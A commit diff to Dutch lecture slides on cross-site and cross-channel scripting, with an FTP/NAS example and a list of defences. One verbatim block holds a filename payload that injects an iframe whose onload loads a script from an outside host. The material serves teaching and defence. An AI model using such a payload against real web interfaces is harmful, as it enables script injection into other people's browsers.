Portfolio xcs: fixed some typo's.

portfolio/xcs/xcs.tex

@@ -37,9 +37,10 @@
 	\frametitle{Cross Site Scripting (XSS)}
 
 	\begin{itemize}
-		\item Invoegen van scripts op een webpagina door slechte validatie
-		\item Web to web
-		\item persistent of non-persistent
+		\item Invoegen van scripts op een webpagina door te profiteren van
+		      slechte validatie
+		%\item Infectie en executie gaan beide via de web interface
+		\item Persistent of non-persistent
 	\end{itemize}
 }
 
@@ -74,19 +75,20 @@
 		\begin{verbatim}
 aanvaller -> non-web protocol -> non-web service
                                       |
-doelwit   <-       HHTP       <- web service
+doelwit   <-       HTTP       <- web service
 		\end{verbatim}
 		\item Persistent
-	    \item Twee op zichzelf veilige services A en B zijn samen onveilig
+	    \item Twee op zichzelf veilige services kunnen in samenwerking onveilig
+	          zijn
 	    \item Moeilijker te detecteren dan XSS
 	\end{itemize}
 }
 
 \frame
 {
-	\frametitle{Voorbeeld XSC: FTP exploit}
+	\frametitle{Voorbeeld XCS: FTP exploit}
 
-    NAS upload bestanden naar web-interface, kunnen we een script
+    NAS is te benaderen via een web-interface, kunnen we een script
     meesturen in de bestandsnaam? \\
     \vspace{4mm}
     \textbf{Uitdagingen}
@@ -101,11 +103,11 @@ doelwit   <-       HHTP       <- web service
 	\frametitle{Voorbeeld XSC: FTP exploit (2)}
 
     \begin{verbatim}
-    "<iframe onload='javascript:document.write(
+    <iframe onload=`javascript:document.write(
     &apos;<html><head><&#47;head><body><script src
     =&quot;http&#58;&#47;a52.us&#47;t2.js&quot;>
     <&#47;script><&#47;body><&#47;html>&apos;);'
-    src='index.htm'>"
+    src='index.htm'>.pdf
     \end{verbatim}
 
 	\begin{itemize}
@@ -185,7 +187,7 @@ aanvaller ->       HTTP       -> web service
 		      stuurt ``raw'' data
 		\item Twitter: escape bij invoer (input time) $\rightarrow$ derde partij
 		      moet unescapen voor eigen format $\rightarrow$ foutgevoelig
-		\item Facebook: escape bij uitvoer (display time) $\rightarrow$ derde
+		\item Facebook: escape at display time $\rightarrow$ derde
 		      partij moet zelf escapen, dit gebeurt soms niet
 	\end{itemize}
 }
@@ -198,7 +200,8 @@ aanvaller ->       HTTP       -> web service
 
 	\begin{itemize}
 		\item Encoding/escaping
-		\item Valideren van onvertrouwde HTML-uitvoer
+		\item Statische analyse van onvertrouwde HTML-uitvoer
+		\item Flow analysis
 		\item Extra validatie bovenop cookies
 		\item Blokkeren van scripts door gebruiker
 	\end{itemize}